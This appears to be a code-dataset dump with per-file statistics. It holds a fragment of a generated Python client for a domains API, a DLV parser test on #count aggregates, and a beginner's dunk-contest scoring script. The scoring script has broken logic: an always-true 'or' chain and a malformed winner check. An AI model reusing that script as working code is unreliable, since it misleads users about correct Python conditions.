# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_by_name(self, domain_name, **kwargs):
"""
Find domain by name
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_name(domain_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str domain_name: name of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_by_name_with_http_info(domain_name, **kwargs)
else:
(data) = self.get_domain_by_name_with_http_info(domain_name, **kwargs)
return data
def get_domain_by_name_with_http_info(self, domain_name, **kwargs):
"""
Find domain by name
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_name_with_http_info(domain_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str domain_name: name of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_by_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_name' is set
if ('domain_name' not in params) or (params['domain_name'] is None):
raise ValueError("Missing the required parameter `domain_name` when calling `get_domain_by_name`")
collection_formats = {}
resource_path = '/{domain_name}'.replace('{format}', 'json')
path_params = {}
if 'domain_name' in params:
path_params['domain_name'] = params['domain_name']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_zone_file(self, domain_id, **kwargs):
"""
Find domain by name
Returns a domain's zone file
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_zone_file(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_zone_file_with_http_info(domain_id, **kwargs)
else:
(data) = self.get_domain_zone_file_with_http_info(domain_id, **kwargs)
return data
def get_domain_zone_file_with_http_info(self, domain_id, **kwargs):
"""
Find domain by name
Returns a domain's zone file
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_zone_file_with_http_info(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_zone_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `get_domain_zone_file`")
collection_formats = {}
resource_path = '/{domain_id}/export'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domains(self, **kwargs):
"""
Getting domains info
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domains(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Domain]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domains_with_http_info(**kwargs)
else:
(data) = self.get_domains_with_http_info(**kwargs)
return data
def get_domains_with_http_info(self, **kwargs):
"""
Getting domains info
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domains_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Domain]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domains" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Domain]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_domain(self, domain_id, body, **kwargs):
"""
Updates a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_domain(domain_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to update (required)
:param UpdatedDomain body: Domain info for update (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_domain_with_http_info(domain_id, body, **kwargs)
else:
(data) = self.update_domain_with_http_info(domain_id, body, **kwargs)
return data
def update_domain_with_http_info(self, domain_id, body, **kwargs):
"""
Updates a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_domain_with_http_info(domain_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to update (required)
:param UpdatedDomain body: Domain info for update (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_domain" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `update_domain`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_domain`")
collection_formats = {}
resource_path = '/{domain_id}'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.23178 | 110 | 0.553187 | 3,329 | 32,837 | 5.209372 | 0.064284 | 0.064583 | 0.022604 | 0.029062 | 0.935994 | 0.919329 | 0.915062 | 0.898109 | 0.893611 | 0.883981 | 0 | 0.000481 | 0.367269 | 32,837 | 836 | 111 | 39.278708 | 0.834192 | 0.308158 | 0 | 0.802993 | 1 | 0 | 0.145375 | 0.023368 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037406 | false | 0 | 0.017456 | 0 | 0.109726 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ad4161feffd0ebdc7031383936ef0ca2a10ddced | 655 | py | Python | tests/parser/bug.76.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.76.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.76.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
%% start file count.dl %%
%#maxint = 5.
n(1).
n(2).
n(3).
a(X) :- X > 0, X < #count{Z : n(Z) }. %#int(X), X > 0, X < #count{Z : n(Z) }.
b(X) :- X < #count{Z : n(Z) }. %#int(X), X < #count{Z : n(Z) }.
c(X1) :- X1 < #count{Z : n(Z) }, X=1+X1. %#int(X), X1 < #count{Z : n(Z) }, +(X, 1, X1).
%% end %%
"""
output = """
%% start file count.dl %%
%#maxint = 5.
n(1).
n(2).
n(3).
a(X) :- X > 0, X < #count{Z : n(Z) }. %#int(X), X > 0, X < #count{Z : n(Z) }.
b(X) :- X < #count{Z : n(Z) }. %#int(X), X < #count{Z : n(Z) }.
c(X1) :- X1 < #count{Z : n(Z) }, X=1+X1. %#int(X), X1 < #count{Z : n(Z) }, +(X, 1, X1).
%% end %%
"""
| 26.2 | 88 | 0.380153 | 132 | 655 | 1.886364 | 0.159091 | 0.289157 | 0.337349 | 0.385542 | 0.955823 | 0.955823 | 0.955823 | 0.955823 | 0.955823 | 0.955823 | 0 | 0.05383 | 0.262595 | 655 | 24 | 89 | 27.291667 | 0.461698 | 0 | 0 | 0.909091 | 0 | 0.272727 | 0.951181 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
ad94e03837898786f96fdda2d35fd1478b5afe58 | 4,597 | py | Python | dunker.py | lop2345/NBA-ALL-STAR-PUBLIC | 6fe70c27f40a4a0e8ea1926e735994e934515dff | [
"BSL-1.0"
] | null | null | null | dunker.py | lop2345/NBA-ALL-STAR-PUBLIC | 6fe70c27f40a4a0e8ea1926e735994e934515dff | [
"BSL-1.0"
] | null | null | null | dunker.py | lop2345/NBA-ALL-STAR-PUBLIC | 6fe70c27f40a4a0e8ea1926e735994e934515dff | [
"BSL-1.0"
] | null | null | null | import random
#i am using random vairble names
y=int(random.randrange(1,101))
if y == 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 or 13 or 14 or 15 or 16 or 17 or 18 or 18 or 19 or 20 or 21 or 22 or 23 or 24 or 25 or 26 or 27 or 28 or 29 or 30:
x=1
else:
x=2
print ("1 is good dunk,2 is bad dunk.")
print (x)
if x==1:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(7,10))
c = int(random.randint(7,10))
d = int(random.randint(7,10))
f = int(random.randint(7,10))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
e=(a+b+c+d+f)
print ("Final score is:",e)
if e >= 45:
print ("Great dunk!")
else:
print ("Good dunk!")
else:
a = int(random.randint(1,6))
b = int(random.randint(1,6))
c = int(random.randint(1,6))
d = int(random.randint(1,6))
f = int(random.randint(1,6))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
e=(a+b+c+d+f)
print("Final score is:",e)
if e <= 20:
print ("Bad dunk!")
else:
print ("Solid dunk!")
y=int(random.randrange(1,101))
if y == 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 or 13 or 14 or 15 or 16 or 17 or 18 or 18 or 19 or 20 or 21 or 22 or 23 or 24 or 25 or 26 or 27 or 28 or 29 or 30:
x=1
else:
x=2
print ("1 is good dunk,2 is bad dunk.")
print (x)
if x==1:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(7,10))
c = int(random.randint(7,10))
d = int(random.randint(7,10))
f = int(random.randint(7,10))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
n=(a+b+c+d+f)
print ("Final score is:",n)
if n >= 45:
print ("Great dunk!")
else:
print ("Good dunk!")
else:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(1,6))
c = int(random.randint(1,6))
d = int(random.randint(1,6))
f = int(random.randint(1,6))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
n=(a+b+c+d+f)
print("Final score is:",n)
if n <= 20:
print ("Bad dunk!")
else:
print ("Solid dunk!")
y=int(random.randrange(1,101))
if y == 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 or 13 or 14 or 15 or 16 or 17 or 18 or 18 or 19 or 20 or 21 or 22 or 23 or 24 or 25 or 26 or 27 or 28 or 29 or 30:
x=1
else:
x=2
print ("1 is good dunk,2 is bad dunk.")
print (x)
if x==1:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(7,10))
c = int(random.randint(7,10))
d = int(random.randint(7,10))
f = int(random.randint(7,10))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
r=(a+b+c+d+f)
print ("Final score is:",r)
if r >= 45:
print ("Great dunk!")
else:
print ("Good dunk!")
else:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(1,6))
c = int(random.randint(1,6))
d = int(random.randint(1,6))
f = int(random.randint(1,6))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
r=(a+b+c+d+f)
print("Final score is:",r)
if r <= 20:
print ("Bad dunk!")
else:
print ("Solid dunk!")
y=int(random.randrange(1,101))
if y == 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 or 13 or 14 or 15 or 16 or 17 or 18 or 18 or 19 or 20 or 21 or 22 or 23 or 24 or 25 or 26 or 27 or 28 or 29 or 30:
x=1
else:
x=2
print ("1 is good dunk,2 is bad dunk.")
print (x)
if x==1:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(7,10))
c = int(random.randint(7,10))
d = int(random.randint(7,10))
f = int(random.randint(7,10))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
w=(a+b+c+d+f)
print ("Final score is:",w)
if w >= 45:
print ("Great dunk!")
else:
print ("Good dunk!")
else:
a = int(input( "Rate this dunk:" ))
b = int(random.randint(1,6))
c = int(random.randint(1,6))
d = int(random.randint(1,6))
f = int(random.randint(1,6))
print("judge 1 score:",a)
print("judge 2 score:",b)
print("judge 3 score:",c)
print("judge 4 score:",d)
print("judge 5 score:",f)
w=(a+b+c+d+f)
print("Final score is:",w)
if w <= 20:
print ("Bad dunk!")
else:
print ("Solid dunk!")
if e > w and r and n:
print ("dunker 1 is winner")
| 26.572254 | 183 | 0.601262 | 984 | 4,597 | 2.808943 | 0.073171 | 0.144718 | 0.191028 | 0.104559 | 0.974674 | 0.969247 | 0.969247 | 0.969247 | 0.95767 | 0.95767 | 0 | 0.107084 | 0.213835 | 4,597 | 172 | 184 | 26.726744 | 0.65772 | 0.006744 | 0 | 0.928144 | 0 | 0 | 0.237292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005988 | 0 | 0.005988 | 0.437126 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.